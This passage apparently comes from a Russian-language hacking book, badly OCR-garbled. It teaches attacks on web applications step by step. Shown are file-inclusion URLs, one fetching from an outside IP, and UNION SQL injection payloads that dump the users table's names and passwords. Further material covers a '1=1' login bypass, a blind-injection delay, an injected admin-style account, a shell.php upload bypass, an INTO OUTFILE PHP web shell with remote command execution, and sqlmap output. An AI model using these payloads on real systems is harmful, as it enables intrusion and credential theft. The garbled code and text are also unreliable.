<1і1>Мо1: РоипсІ</Ы> 

<р>ТИе гелиезТесІ ІІКІ_ маз поі Гоипсі оп ГНіз 5егѵег.</р> 

<ІІГ> 

<ас1сіге55>АрасІіе/2.4.7 (ІІЬипІіи) Зегѵег аТ: 127.0.1.1 Рог! 80</асІсІге55> 

</ЬосІу></М:т1> 

Вся информация о данной сессии, включая запрос, была сохранена в лог- 
файле — /ѵаг/1о§/арасЬе2/ассез5.1о§. Сформировав правильный запрос, мы сможем 
выполнять на сервере команды — например, ПсопГф: 

1ДТр://сІиттуІ'Ю5І:.пе1:/ргеѵіе\лі.рІір&стсІ=і-Рсоп-Рі§&?-Рі1е=../ѵаг/ 
1о§/арасРіе2/ассе55 . 1о§%00 

Задача становится совсем простой, когда есть возможность загрузить удаленный 
файл. Например, создадим на сервере с ІР-адресом 123.45.250.18 файл іезі.Ш:. Линк 
для уязвимого сервера будет выглядеть следующим образом: 

ЫТр: //сІиттуИозІ: . пеТ/ргеѵіеи. рНр?С01_0К=Н1:1:р: //123.45.250. Ів/Тезі: ЛхіХвв 

5(2І_-инъекции 

80Г-иі[Ъ(‘кции представляют собой один из самых интересных, сложных и мощ¬ 
ных видов атак. Для их реализации вам потребуются хорошие знания баз данных, 
самого 80,Ь и веб-программирования. 

Как и на предыдущем шаге, возможность провести ЗЦЬ-инъекцию зависит от ка¬ 
чества работы программиста. Если данные перед отправкой на сервер не проходят 
должной проверки, то у злоумышленника появляется возможность провести атаку 
данного типа. 

80 Г-ішъекціпі — это атаки на веб-приложения, использующие для своей работы 
базы данных. Атаки, по сути, представляют собой внедрение кода в существующий 
запрос с целью получения доступа к данным или манипулирования ими. Благодаря 
повсеместной распространенности ЗЦБ атаки этого типа работают практически на 
всех платформах. 

Для проведения успешной атаки необходимо понимать, с какой базой данных вы 
работаете. Приведем небольшой пример, который будет работать только с базами 
данных Мі с і'озо Гг и Огасіе. 

5Е1.ЕСТ * РКОМ агіісіез 
ІдІНЕКЕ сгеаіог = ’ЬоЬ' 

АМЭ аг1:іс1е_пате = ’5я1_аЬс’; 

ОЕЬЕТЕ РКОМ аПісІез; 

В данном примере атакующий добавляет свой код после символа «;», обозначаю¬ 
щего конец запроса. Только две указанные выше СУБД позволяют выполнять под- 
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ряд несколько запросов, разделенных символом «;» и следующих друг за другом. 
Остальные же СУБД вернут сообщение об ошибке. 

Зачастую, особенно в крупных организациях, принято разделять серверы баз дан¬ 
ных и веб-приложений. Для поиска СУБД определенного типа можно использовать 
N М А И В его состав входят скрипты, которые помогают работать с различными 
сервисами. 

Поиск серверов с установленным МуЗЦБ: 

птар -р 3306 - -зсгірГ=тузр1-епит 192.168.24.0/24 

5ГагГіп§ КІтар 7.30 ( НТГрз://птар.ог§ ) аГ 2016-10-21 11:08 ЕРТ 
КІтар зсап герогГ Гог сіЬ.тусоогр.сот (192.168.24.10) 

РОКТ 5ТАТЕ 5ЕКѴІСЕ КЕА50ІЧ 
3306/Гср орел тузрі зуп-аск 
| тузрі-епит: 

АссоипГз 

асітіп : <етрГу> - Ѵаіісі сгесіепгіаіз 
ТезТ:<етрГу> - Ѵаіісі сгесіепТіаІз 
ТезТ_тузр1: <етрГу> - Ѵаіісі сгесіепгіаіз 
ЗГаГізГісз 

|_ РегГогтесІ 11 §иеззез іп 1 зесопсіз, аѵега§е Грз: 11 

Поиск серверов с установленным МісгозоЙ 800 

птар -р 445 --зсгірГ тз-зрІ-іпГо 192.168.24.0/24 

5ГагГіп§ ІМтар 7.30 ( НТГрз://птар.ог§ ) аГ 2016-10-21 12:08 ЕРТ 
Nтар зсап герогГ Гог сІЬ2.тусоогр. сот (192.168.24.15) 

Ыіпсіомз зегѵег пате: ЫІІМХР 
192.168.24.15\сІЬ2: 

ІпзГапсе пате: сІЬ2 
Ѵегзіоп: 

пате: МісгозоГГ 5()1 5егѵег 2000 5РЗ 
питЬег: 8.00.760 

РгосіисГ: МісгозоГГ 5()Г 5егѵег 2000 
5егѵісе раск Іеѵеі: 5РЗ 
РозГ-5Р раГсНез аррііесі: N 0 
ТСР рогГ: 1278 

ІМатесі ріре: \\192.168.24.15\ріре\М55(2Е$РКОР\зр1\риегу 
СІизГегесІ: N 0 

192.168.24.15\5С>І.ЕІКЕЫАЕЕЕ0: 

ІпзГапсе пате: 5<2І_РІКЕЫАЕЕЕР 
Ѵегзіоп: 

пате: МісгозоГГ 5(21. 5егѵег 2008 КТМ 
РгосіисГ: МісгозоГГ 5()І- 5егѵег 2008 
5егѵісе раск Іеѵеі: КТМ 
ТСР рогГ: 4343 
СІизГегесІ: N 0 

\\192.168.24.15\ріре\зр1\риегу: 

Ѵегзіоп: 
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пате: Міспозо-Рі 5()І_ 5егѵег 2005 5РЗ+ 
питЬег: 9.00.4053 

РгосІисТ: Міспозо-Рі 5(21. Зегѵег 2005 
Зегѵісе раск Іеѵеі: 5РЗ 
Розі-БР раТсИез аррііесі: Ѵез 
|_ ІМатесІ ріре: \\192.168.24.15\ріре\зя1\лиегу 

После того как сервер найден, следующим шагом будет попытка взлома пароля. 
Есть множество программ для перебора паролей, например ЗЦЫісХ. 


5<2І_(1ІЛ О О 

5ІЗІ_сіісІ 2.1 - ТИе 501. Зегѵег Оісііопагу АІІаскег 
соругідЫ (с) 2000, Агпе ѴісЫгот 
ате.ѵісІ$Ігот@пІ$есигіІу.пи • Ы1р://п($есигі1у.пи 



5іаг( | 5іор : | Ехіі 



А 

А 

д 

д 


Рис. 4.5. Интерфейс 5С>І-СІІс(: 


80ІЛІІСІ. работает по принципу перебора паролей из файла. Это значит, что нам 
понадобится файл с паролями. Найти его достаточно несложно, используя тот же 
Соо§1е. Например, на сайте кЫр5://тікі.$киІІ$есигі{.у.огр/ітІех.ркр?йіІе=Ра$шогсІ$ 
имеется очень хорошая подборка таких файлов. 

Теперь определимся с тем, какие же веб-приложения являются уязвимыми для 
80Г-иі[ъекций. Для их поиска существует множество способов, но возьмем самый 
простой — поиск с помощью Соо§1е. 

Мы уже описывали различные способы запросов к этой поисковой системе. Теперь 
приведем пример того, как можно использовать их для поиска уязвимых приложе¬ 
ний. Можно выбрать любой из них или придумать свой, а также комбинировать 
с другими запросами — например, для поиска только по определенному сайту. 

іпигі : іпсіех. рГір?ісІ= 

Іпиг1:1:гаіпег5.р1ір?іс1= 
іпигі: Ьиу. рІір?са1:е§опу= 
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іпигі : агіісіе . рЬр?Ю= 
іпигі: ра§еісІ= 
іпигі: §ате5. рЬр?ісІ= 
іпигі: ра§е. рЬр?-Рі1е= 
іпигі: пемзРеіаіІ. рЬр?ісІ= 
іпигі: §а Негу . рЬр?ісІ= 

После того как цель для атаки найдена, необходимо убедиться в том, что уязви¬ 
мость действительно существует. Один из самых простых способов сделать это — 
просто добавить в конце ШІЬ символ «’». Если после отправки такого запроса 
сервер вернет сообщение об ошибке, это значит, что цель определена верно. 

Проверка на уязвимость: 

Ыір ://ими. тусогр. сот/иеЬ/іпсІех . рНр ?ісІ=31 ' 


Ошибка сервера: 

ІлІагпіп§: ту5рі_Реі:сіі_аггау() : зиррііесі аг§итепі І5 поі а ѵаіісі Му5(2І_ гезиіі: 
гезоигсе іп /Ьоте/сизіотегз/тусогр /риЫіс_Шт1/асітіп/ра§е. сіазз. рЬр оп Нпе 847 

Теперь узнаем немного больше о нашей цели. Например, получим информацию 
о структуре базы данных, а именно о количестве столбцов в таблице. Для этого 
добавим в конце ІЖЬ «-» и «огсіег Ьу 15—». 

МДр: //ими.тусогр. сот/иеЬ/іпсІех.рИр?ісі=-31 огсіег Ьу 15-- 

После отправки такого запроса мы наверняка получим сообщение об ошибке, но 
так и должно быть — это значит, что в таблице меньше 15 столбцов. Каждый раз 
перед отправкой очередного запроса необходимо уменьшать значение огсіег Ьу 
на единицу — огсіег Ъу 14, огсіег Ьу 13, огсіег Ьу 12 и т. д. В какой-то момент мы не 
получим сообщения об ошибке. В данном случае, атакованная система перестала 
выдавать такие сообщения при значении оператора огсіег Ьу равном «7». А это 
значит, что мы нашли правильное значение. 

Далее получим данные от СУБД, используя «ипіоп аіі зеіесі». Вся прелесть данного 
оператора в том, что при помощи него мы можем выполнять свои запросы и видеть 
результат их выполнения на уязвимой веб-странице. Однако у этого оператора 
есть одна особенность — работая с ним, мы должны указывать четкое количество 
колонок, но этот параметр мы уже узнали на предыдущем шаге. 

Мы уже установили, что количество колонок в таблице равно семи, поэтому наш 
запрос будет выглядеть следующим образом: 

Ыір: //ими.тусогр. сот/иеЬ/іпсІех. рИр?ісі=-31 ипіоп аіі зеіесі; 1 , 2 , 3,4,5,6,7--+ 

Как мы видим, уязвимыми к дальнейшим атакам являются колонки под номерами 2 
и 3. Это важно, поскольку далее мы будем работать с одной из этих колонок. Ниже 
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Рис. 4.6. Результат работы «ипіоп аІІ зеіесб» 


приведены примеры запросов, которые помогут нам получить много интересных 
данных. 

Узнать версию СУБД: 

ЬТТр://иии.тусогр.сот/иеЬ/іпсіех.рНр?ісі=-31 ипіоп аІІ аеіесі 1,2,@@ѵег5іоп,4,5,6,7--+ 

Получить список баз данных: 

ЫТр://ммм.тусопр. сот/меЬ/іпсІех.рНр?ісі=-31 ипіоп аІІ зеіесі 1,2, §гоир_ 
сопсаТ(5СІіета_пате),4,5,6,7 Ггот іпГогта1:іоп_5СІіета. зсНетаіа--+ 

Получить имя текущего пользователя базы данных: 

Ы1:р://и\«м.тусогр. сот/меЬ/іпсІех. рЬр?ісІ=-31 ипіоп аІІ зеіесі 1,2,и5ег(),4,5,6,7--+ 

Определить текущую базу данных: 

Мі:р://іл/ыи.тусогр.сот/меЬ/іпсІех.рЬр?ісІ=-31 ипіоп аІІ зеіесі 1,2, 
сопсаТ(сІаТаЬа5е()),4,5,6,7-- + 

Получить список таблиц: 

ЬТТр://иим.тусогр.сот/иеЬ/іпсІех.рЬр?ісі=-31 ипіоп аІІ зеіесі 1,2, §гоир_ 
сопса1:(1:аЫе_пате),4,5,6,7 Тгот іпГогтаТіоп_5СІіета.ТаЫе5 мііеге іаЫе_ 
5сЬета=сІаТаЬа5е() -- + 

Получить имена таблиц и колонок: 

ЬТТр://иим.тусогр.сот/иеЬ/іпсІех.рНр?ісі=-31 ипіоп аІІ зеіесі 1,2, ТаЬе1е_ 
пате, 4,5,6,7 Ггот іпГогта1:іоп_5с1іета.1:аЫе5--+ 

Теперь, зная, что в системе есть таблица изегз, извлечем из нее данные: 

ИТТр: //ими. тусогр.сот/меЬ/іпсІех.рЬр?ісІ=-31 ипіоп аІІ зеіесі 1,2, со1итп_ 
пате, 4,5,6,7 Тгот іпГогта1:іоп_5сЬета. соіитпз мИеге ТаЫе_пате=' и5ег5' --+ 
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Получив структуру таблицы изегз, извлечем из нее значения полей пате и разз\ѵ: 

НТ1:р://иим.тусогр.сот/иеЬ/іпсІех.рНр?ісі=-31 ипіоп аіі зеіесі 1 , 2 , 
сопса1:(пате, 0x3а, ра55и).,4^ 5,6,7 -Рпот изег5-- + 

Используем формы. Практически все веб-приложения используют формы, предна¬ 
значенные для самых разных целей, — опросы, регистрация, отправка сообщений, 
восстановление пароля и т. д. Причина, по которой формы могут стать входной 
дверью для атакующего, все та же — отсутствие проверки данных, введенных 
пользователем. 

Для примера возьмем форму восстановления паролей. В данном случае пользова¬ 
телю предлагают ввести свое имя и адрес электронной почты. После ввода система 
проверит, действительно ли у данного пользователя такой адрес, и, в случае успе¬ 
ха, отправит ему инструкцию по восстановлению пароля. Посмотрим, что можно 
сделать с этой формой. 


Раззѵ/огсі Резеі 

То гезеі ѵоиг раззѵѵогсі. епіег уоиг изегпате апй етаіі асЮгезз іп Ніе Ііеійз Ьеіоѵѵ апй 
сііск №е Сопііпие Ьийоп. 11 уои (Іо поі Ііаѵе ап етаіі айсігезз аззосіаіей \ѵі№ уоиг 
изегпате, ріеазе сопіасі уоиг асітіпізігаіог Тог аззізіапсе. І_еаѵе Нііз Ьгоѵѵзег ѵѵіпОоѵѵ 
ореп апй сМеск уоиг етаіі. Уои жіІІ гесеіѵе а теззаде Тгот из сопіаіпіпд а кеу. Сору №аі 
кеу апо геіит іо ітз ѵѵіпаоѵ/ ѵтеге уои ѵѵш гесег/е шппег тзігисяопз. 

ІІэегпоте 

Етаіі 


Рис. 4.7. Форма для сброса пароля 

В подобном случае мы попытаемся сформировать 5С)Ь-запрос таким способом, 
чтобы получить или изменить существующие данные. 

Предположим — а мы это будем делать практически всегда, ведь программный код 
приложения нам практически никогда не бывает известен, — что после отправки 
данных на сервере выполняется следующий запрос: 

5Е1.ЕСТ сіаТа РК0М іаЫе ІдІНЕКЕ етаіі = ' $етаі1_Ргот_іприі: '; 

Практически всегда данные, которые вводит пользователь, присваиваются опреде¬ 
ленной переменной, а затем эта переменная используется для дальнейшей работы 
приложения. Однако для успешной атаки мало одних предположений, необходимо 
получить дополнительные данные. Попробуем заставить программу выдать нам 
ошибку. Введем неправильный адрес электронной почты и используем специаль¬ 
ный символ в конце. 


Ьогп1;оЬеіл/і1сІ@Ііоі;таі1 . сот 
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Если вводимые пользователем данные обрабатываются, то мы получим лишь 
скупое сообщение о том, что мы ввели неправильный адрес, или же не получим 
ничего. Однако если приложение уязвимо, то мы непременно получим развернутое 
сообщение о невозможности выполнить запрос. 


Яипііте Еггог 

Оезсгірііоп: Ап арріісаіюп еггог оссиітегі оп іііе зегѵег ТЬе сиггепі сизіот еггог зеійпдз Тог ііііз аррісаііоп ргеѵепі ІЬе (іеіаііз о(іііе арріісаііоп еггог 
Ггот Ьвіпд ѵіеѵѵе<1 гетоіеіу (Гог зесигйу геазопз). К соиісі, Ьоѵігеѵег, Ье ѵіеѵѵечі Ьу Ьгоѵѵзегз гиппіпд оп Оіе ІосаІ зегѵег тасИіпе. 

Оеіаііз: То епаЫе іііе гіеіаііз оГІіііз зресіЯс еггог теззаде іо Ье ѵіеѵѵаЫе оп гетоіе тасіііпез, ріеазе сгеаіе а <сизіотЕггогз> іад ѵѵіііііп а “ѵѵеЬ.сопЯд’ 
сопіідигаііоп ЯІе Іосаіей іп Ніе гооі (Іігесіогу оТ№е сиггепі ѵѵеЬ арріісаііоп. Тіііз <сизіогпЕггогз> іад зіюиИ іііеп ііаѵе ііз "ггкніе" аіігіЬиіе зеі іо "О(Г. 


<!— ѴѴеЬ.СоггРід Сопіідигаііоп Рііе —> 

<сопііаигаііоп> 

<5у5Іеяі.меЬ> 

■ссизІотЕггогз тогіе="Оіі’’/> 

</5у5Іет.меЬ> 

</сопіі ди г аіі оп> 

N0(65: Тііе сиггепі еггог раде уои аге зееіпд сап Ье герйсегі Ьу а сизіот еггог раде Ьу тогіііуіпд іЬе "(ІеГаиЖегіігесГ аіігіЬиіе оііЬе арріісаііоп'з 


Рис. 4.8. Сообщение об ошибке 

В данном случае ВЦЬ-запрос для системы выглядел следующим образом: 

5Е1.ЕСТ сіаТа РКОМ іаЫе ІдІНЕКЕ етаіі = ' ЬопгІ;оЬемі1сІ@Ііо1;таі1 .сот 

Внимательно изучив сообщение об ошибке, можно решить, что мы будем делать 
на следующем шаге. Но, к сожалению, такие ошибки не всегда бывают инфор¬ 
мативными. Если нам не удалось получить достаточно информации из такого 
сообщения, то можно попробовать получить информацию обычным перебором. 
Практически всегда столбцы в базе данных имеют понятные человеку названия 
и отражают суть информации, которая там будет храниться. Теперь узнаем, с ка¬ 
кими полями работает наше приложение. Просто подставим это в поле для ввода 
адреса электронной почты: 

ЬогпіоЬемі1сІ@Ііоі:таі1 . сот’ АШ етаіі 15 N1111; -- 

Меняя имя поля, указанное после оператора ЛЫБ (на е-шаіі, шаіі, етаіі), мы вы¬ 
яснили, что существует столбец с названием етаіі. В данном случае интерпретация 
поведения приложения будет такой же, как и в других случаях. Если мы получаем 
сообщение об ошибке, наше предположение неверно. Однако если мы получаем 
любое другое сообщение или не получаем ничего, это знак того, что наша попытка 
увенчалась успехом. Аналогично можно подобрать поля изегісі, раяяѵѵопі, Іа8і_Іофп 
ит. д. 
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Но это не все. Используя данный подход, можно найти имена таблиц: 

Ьогп1:оЬемі1сІ@ііо1:таі1 .сот' АШ 1=(5Е1_ЕСТ СОШТС*) РКОМ ТаЫепате); -- 

Теперь, зная структуру таблицы, содержащей данные о пользователях, добавим 
новую запись: 

Ьогп1:оЬемі1сІ@ііо1:таі1 .сот' М5ЕКТ ІМО тетЬег5 ’етаіі', ’раззілісГ, ' 1о§іп_ісІ ', '-Ри11_ 
пате') ѴАШЕ5 (’ запе@таі1тап .сот', '12345', '^апе', 'Оііѵе Запе');-- 

Теперь мы спокойно можем зайти в систему, используя только что созданную 
учетную запись. Обратите внимание на то, что в базе данных могут быть поля, 
указывающие на принадлежность пользователя к привилегированным группам — 
например, к группе администраторов. В таком случае, повысив привилегии, можно 
просто и легко перехватить управление веб-приложением. 

Есть еще одна очень интересная возможность обойти аутентификацию, используя 
уязвимые формы. Для начала немного теории. 

Предположим, что в таблице пользователей интересующего нас сайта помимо 
прочих полей существуют — изегпате и раззѵѵопі. При выполнении следующего 
запроса система вернет нам все записи из таблицы: 

ЗеІесТ * Ггот изегз; 

Если же мы используем запрос с несуществующими значениями, то СУБД не вер¬ 
нет нам ничего, что тоже вполне логично, ведь у нас нет пользователя «поіххіу» 
с паролем «поразз». 

Зеіесі: * -Ргот изегз «Неге пате=' поЬосІу ' апсі раззмогсі= ' поразз'; 

Однако если мы немного изменим запрос, то система выдаст нам все записи. Не¬ 
смотря на то что пользователя «поЪобу» не существует, условие 1 = 1 всегда будет 
выполняться. Согласитесь, трудно представить, что 1 когда-нибудь станет не рав¬ 
ным 1. Символ # указывает СУБД на то, что все записанное после него является 
комментарием и исполняться не должно. 

Зеіесі: * -Ргот изегз «Неге пате=' поЬосІу ' ог 1=1;# апсі ра55могсі= ' поразз ’; 

Теперь, используя оператор БІМІТ, модифицируем запрос так, чтобы он возвращал 
не все записи, а только первую: 

ЗеІесТ * -Ргот изегз «Неге пате=' поЬосІу ' ог 1=1 І_ІМІТ I;# апсі раззі«югсІ= ' поразз'; 

Вот мы и получили только одну запись. Теперь применим это на живой системе 
для того, чтобы получить доступ к закрытой части страницы. 
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АиІИепййсаііоп 

НѳпІКІап! ІпоЬскѴ ог 1-1 ИМ ГГ I;# | 

Моі сіе Разве ои Раззсосіе ОТР I»»»»»»»»»»»! | 

Ргетіёге соппехіоп раг сіе ОТР : асііѵег та сіе 

Рис. 4.9. 5(ЗІ_.-инъекция посредством формы аутентификации 

Но что же делать, если система не возвращает ничего? В этом случае можно по¬ 
пытаться сделать слепую ЗЦЬ-инъекцию. Используя данный метод, мы больше не 
полагаемся на выводимые системой сообщения, но все так же можем манипули¬ 
ровать информацией. 

Есть несколько способов слепой инъекции. Рассмотрим вариант с временной 
задержкой. Суть его очень проста: мы помещаем оператор, задерживающий ис¬ 
полнение команды на определенное время, в самый конец выражения. Таким об¬ 
разом, если сработала первая часть, то мы узнаем об этом по задержке, к которой 
приведет вторая часть выражения. Ведь если первая часть не сработает, то и вторая 
не выполнится. 

ІР ЕХІ5Т5(5ЕІ_ЕСТ * РКОМ ІІ5ѲГ5) ИАІТРОК ЭЕІ.АѴ ’0 :0 :10 

В случае, если таблица с названием изегз существует, мы получим при выполнении 
данного запроса десятисекундную задержку. 

Однако не стоит думать, что атакам данного типа подвержены исключительно поля 
для ввода каких-либо данных. На самом деле модифицировать запрос можно, ис¬ 
пользуя любой элемент — радиокнопки, выпадающие списки и т. д. 

Эксплуатация уязвимостей элементов форм, отличных от полей ввода данных, 
доставляет некоторое неудобство — ведь мы не можем ввести нужные данные 
и отправить их на сервер простым нажатием кнопки. В таком случае нам при¬ 
дется модифицировать НТТР-запросы. Справиться с этой задачей нам поможет 
локальный прокси-сервер. Для наших целей отлично подойдет Ташрег Пара — это 
плагин для РігеіЪх, позволяющий перехватывать запросы, модифицировать их 
и отправлять дальше. 

После установки плагина перезапустите КігеГох, откройте форму, которую вы хо¬ 
тите проанализировать, и в Ташрег БаГа нажмите «5і;агі: Ташрег». 

Поле того как вы нажмете на веб-странице кнопку «отправить», плагин будет 
перехватывать все запросы. После перехвата запроса у вас будет несколько вари¬ 
антов — отправить, отменить или просмотреть запрос. После анализа запросов мы 
нашли нужный — в нашем случае это поля для выбора формата письма — и моди¬ 
фицировали его. 
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БіаііТатрег Зіор іатрег Сіеаг 
РіІИег 


КедІБІгаііоп • ТКе КедІ 5 іе 


Л Кедігігайоп • ТНе Ре.- х , * 


( Ф ; ассоипиІЬегедІ 5 Іег.со.ик/геді 5 Іег/ 


Тітс 

Оигайоп 

Тоіаі Эига 

8:32:42.996 

206ГП5 

206 015 

8:32:43.191 

8:32:43.430 

215 0П5 
197 оі5 

215 015 

197 оі5 

8:32:43.638 

8:32:44.057 

409 Ш5 
2993 Ш5 

409 Ііі5 
2993 015 

8:32:44.268 

8:32:44.270 

277 т5 
106 ПП5 

277 015 

106 015 

8:32:44.273 

425 лл5 

425 015 

8:32:44.3/9 

2320 Ш5 

2320 015 

8:32:44.445 

8:32:46.704 

0О15 

279 ПЛ5 

0 015 

279 015 

8:32:46.990 

239 015 

239 015 

1 ■ 

КедиеБ* Неасіег... 

КедиеБ* Неасіег Ѵа 

1 Н05І 


ассоипІЛЬегедізІег. 


ИЗ Мо5Г ѴІБІіесІ ѵ |ЩОГГеп5!ѵе Зесигіту \КаІШпих \КаІЮос5 \КаІІТі 


Еідп ыр Рошгг .2 


ТТіеДЯ 


ІІ5ег-Адепі 

Асссрі 

АссерМапдиаде 

Ассері-Епсобіпд 

КеГегег 

Соокіе 

Соппесйоп 

Сопіепі-Туре 

Сопіспі І_епдІЬ 


Р05ТОАТА 


МогіІІа/5.0 (ХИ; Уп 
ІсхУМтІ.оррІісойог 
еп-ІІ5,еп;д=0.5 
дгір, ёеЯаІе 
ітр://ассоит.оіеге 
йагУѵеКатрМаІсІі 
кеер-аііѵе 
аррІісаІіоп/х-ѵѵѵѵѵИ 
377 


ргосІис1=16егед(5Іег 


Л ОАТАСаіТЯЕ 50ЕТОАКЕ 5ЕСЙНІТУ ТКАЙ5РОЯМАТЮН РЕѴОР5 ВиЗІМВ 

Сгеаіе Ассоипі 

Зоггу - Ніеге ѵѵаз а ргоЫет ѵѵШі уоиг апзѵѵегз. РІеазе Іаке 

Сгеаіе ап ассоипі Іо гесеіѵе пеизіейегз, соттепі оп апісіез, изе (Ье (ог 
АІгеагіу Ьаѵе ап ассоипі? Йод іп (іеге. 

№ѵѵзІеПег 8 
Спппяр етаіі Гогтат 


Техі апб НТМЙ 


РаМу 


ТІіе ѵегу Іаіезі ГіеасІІіпез Іо 
уоиг ІпЬох ОаІІу. 


ТРе Недізіег 


ѴѴеекІу 


ТРе ргеѵіоиз меек’5 
РеаОМпез - Ьу зііе ог юріс. 

У ТРе Ред йідезі 


ТІіе РедіЫеі иьеь июкіез. Ріп 


Рис. 4.10. Форма для регистрации, запущенный плагин «Татрег Оаіа» 


При помощи этого плагина можно не только осуществлять ЗЦЬ-инъекции, но 
и обходить различные ограничения. Технология та же. Например, есть сайт, позво¬ 
ляющий загружать картинки только определенного типа. Проверка типа картинки 
происходит на стороне пользователя, а это значит, что на сервер отправится запрос, 
который уже не будет проверяться. 

Предположим, что мы хотим загрузить зЬеІІ.рЬр на сервер, но через форму мы 
можем отправлять только файлы с расширением рсіі. Не беда! Сделаем в той же 
директории копию файла и переименуем в зЬсІІ.рсІГ. Затем воспользуемся формой 
и отправим переименованный файл на сервер. В момент отправки Татрег Баіа 
перехватит запрос. Наша задача — найти то поле, где указан зЬеІІ.рсЬ, и переиме¬ 
новать его в зЬеІІ.рЬр. Таким образом, мы добились своего — нужный файл будет 
загружен на сервер! 
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ТатрегРорир 

НКр://ассои пі.(Не геді 5*е г. со. ик/геді 5*е г/ 


о 



Рис. 4.11. Модификация параметра «1;ех1;_опІу» в Татрег Оаііа 


Однако, используя 50В, тоже можно загружать файлы на сервер и исполнять их. 
Сразу уточним, что возможность загружать и исполнять файлы на сервере зависит 
от его конфигурации. Серверы под управлением ѴѴ'іпсІоѵѵз более уязвимы к данному 
типу атак. 

Возьмем запрос, сформированный на предыдущем шаге, и модифицируем его, ис¬ 
пользуя функцию ІоасІ ПІе: 

вТСр://иим.тусогр.сот/иеЬ/іпсІех.рНр?ісІ=-31 ипіоп аіі зеіесі 1,2,1оасі_Ті1е(' с: / 
міпсІоы5/5у5І;ет32/сІгіѵег5/е1:с/Ііо5І:5 '),А,Ъ,6,7--+ 

В данном случае сервер вернет содержимое файла Ьозіз, но это не самое интересное. 
Попробуем создать и запустить собственный файл: 

ШСр://имм.тусогр. сот/иеЬ/іпсІех.рНр?ісІ=-31 ипіоп аіі зеІесТ 1,2," <?рИр есРіо 5Ие11_ 
ехес($_СЕТ[ 1 стсі ’ ]); ?>" ,4,5,6,7 іпіо ОІІТРПЕ ’ с:/хатрр/Шсіоса/ехес.рМр ’-- + 

Теперь, создав файл, мы можем вызывать его с нужным параметром. Сразу же 
возникает вопрос: а какой параметр нужен? Любой, который можно выполнить из 
командной строки на стороне сервера. Для примера выполним ірсопй§. 
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<? : | Ітр://192.168.0.16/ехес,рПр?стб=ірсопГ1д | с | |<Ч зеагсіі 

@д Мо5І Ѵізііес) т ЦОііепзіѵе Зесигііу \КаІШпих \КаІЮос5 \КаІіТооІ$ ЛЕхрІоіі-ОВ І^АІгсгас 

Ыіпбоиз ІР Сопіідигаііоп Еібегпеі абаріег Ьосаі Агеа Соппесііоп* 11: Соппеі 
Зиіііх . : шусогр.сош Ипк-Іосаі ІРѵб Аббгезз.: іе7Ѳ::б2сб:ба4і 


Аббгезз.: 192.168.0.16 ЗиЬпеі Мазк. 

Оеіаиіі Саіемау.: Еібегпеі абаріег 1_осаі Агеа Соппесііоп’ 


. : мебіа бізсоппесгеб соппесііоп-зресіііс она зиіііх . :і 

мігеіезз мешогк соппесііоп 2 : мебіа віаіе.: мебіа б: 

соппесііоп-зресіііс риз зиіііх . : моЫІе вгоабЬапб абаріег моЫІе вгоабЬап 

віаіе . : мебіа бізсоппесіеб соппесііоп-зресіііс рыв 5' 

абаріег 1_иса1 А{ еа Сопііесііоп* 12: Мебіа Віаіе.: Меб 

СомпесІіоіі-зресіГіс РИЗ ЗиГГіх . : 


Рис. 4.12. Результат исполнения ірсопйд на стороне сервера 


Автоматизация процесса. Безусловно, все написанное выше очень важно для по¬ 
нимания 80І.-шіъе кций, однако гораздо проще пользоваться автоматическими 
инструментами, которые выполнят большую часть работы за вас. Одной из заслу¬ 
живающих внимания программ является зцітар. Ее можно использовать не только 
для поиска уязвимостей, но и для эксплуатации уже найденных. 

Для примера запустим зцішар с целью автоматического поиска уязвимостей на 
интересующей нас странице: 

гооі@ка1і:~# злітар -и біір://ммм.тусогр.ог@ --сгам1=1 
[*] зіагііп§ аі 10:30:43 

бо уои мапі іо сбеск Тог іііе ехізіепсе оТ зііе'з зііетар( .хті) [у/І\І] 

[10:30:43] [ІИРО] зіагііп§ сгаміег 

[10:30:43] [ІИРО] зеагсбіп§ Тог Ііпкз мііб беріб 1 

бо уои мапі іо зіоге сгам1іп§ гезиііз іо а іетрогагу Тііе Тог еѵепіиаі Тигібег 
ргосеззіп§ міііі оібег іооіз [у/РІ] 

[10:30:46] [ІИРО] зяітар @оі а іоіаі оТ 13 іаг§еіз 
ІІК1. 1: 

6ЕТ біір://ммм.тусогр. ог§:80/тобе1з_беіаі1.рбр?іб=2 
бо уои мапі іо іезі ібіз ІІКЬ? [Ѵ/п/р] 

> 

[10:30:47] [ІИРО] іезііп§ ІІКЬ 'біір://ммм. тусогр.ог§:80/тобе1з_беіаі1.рбр?іб=2' 
[10:30:47] [ІИРО] изіп@ '/гооі/.5д1тар/оиіриі/гези1із-11032016_1030ат.сзѵ' аз ібе 
С5Ѵ гезиііз Тііе іп тиіііріе іаг§еіз тобе 
[10:30:47] [ІИРО] іезііп§ соппесііоп іо іИе іаг§еі ІІКЬ 

[10:30:54] [ІИРО] сбескіп§ іТ ібе іаг@еі із ргоіесіеб Ьу зоте кіпб оТ ЫАР/ІР5/Ю5 
[10:30:56] [ІИРО] іезііп§ іТ іИе іаг§еі ІІКЬ із зіаЬІе 

[10:37:44] [ІИРО] 6ЕТ рагатеіег 'іб' із 'Му$0Д ІІМСМ лиегу (ши.) - 1 іо 20 
соіитпз' іпд'есіаЫе 

6ЕТ рагатеіег 'іб' із ѵиІпегаЬІе. Эо уои мапі іо кеер іезііп§ ібе оіііегз (іТ апу)? 
[у/м] 

зрітар ібепііТіеб ібе То11оміп§ іпдесііоп роіпі(з) мііб а іоіаі оТ 91 НТТР(з) 
гериезіз: 

Рагатеіег: іб (6ЕТ) 

Туре: Ьооіеап-Ьазеб Ьііпб 
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ТіТІе: АШ Ьооіеап-Ьазесі Ыіпсі - ИНЕКЕ ог НАѴІМО сіаизе 
Рауіоасі: ІСІ=2 АМР 7324=7324 

Туре: АМР/ОК Тіте-ЬазесІ Ыіпсі 

ТіТІе: Му5<21 >= 5.0.12 АМР Тіте-ЬазесІ Ыіпсі (соттепТ) 

Рауіоасі: ісІ=2 АМР 51_ЕЕР(5)# 

Туре: ІІМІОМ яиегу 

ТіТІе: Му5<21 ІІМІОМ лиегу (N1111) - 11 соіитпз 

Рауіоасі: ІСІ = -6266 1Ш0М АН 5ЕЕЕСТ N1111, N1111, N1111, N1111, N1111, N1111, N1111, СОМСАТ(0Х 
716а6а6а71,0х68494973784с556Г467756484е68584Г736а7279666Г635а4774414566627649724947 
597961647а, 0x7171767871) , N1111, N1111, МШ1# 

сіо уои мапТ То ехріоіт ТНіз 5()1 іпз'есТіоп? [Ѵ/п]п 

А теперь используем кдітлар для получения структуры базы данных целевой си¬ 
стемы: 


